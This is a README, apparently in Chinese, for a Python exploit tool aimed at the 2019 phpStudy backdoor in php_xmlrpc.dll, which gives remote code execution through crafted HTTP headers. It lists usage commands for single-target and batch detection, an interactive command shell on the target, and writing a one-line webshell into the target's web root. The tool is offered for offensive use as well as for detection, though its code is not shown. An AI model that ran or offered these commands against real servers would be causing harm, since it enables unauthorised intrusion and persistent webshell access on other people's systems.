0x00 概述
20190920 phpstudy爆出存在后门,该软件官网在2016年被入侵,软件安装包(php_xmlrpc.dll)被植入后门,利用http请求头的Accept-Encoding: gzip,deflate和'Accept-Charset'可造成远程代码执行。
本工具支持单url检测,cmdshell,get web shell(写入一句话木马),批量检测。
0x01 需求
python2.7
pip install requests
0x02 快速开始
使用帮助: python phpstudy-backdoor-rce.py -h
单url漏洞检测: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/"
cmdshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --cmdshell
getshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --getshell --web-path WWW
批量检测: python phpstudy-backdoor-rce.py -f urls.txt
0x03 反馈
gmail:[email protected]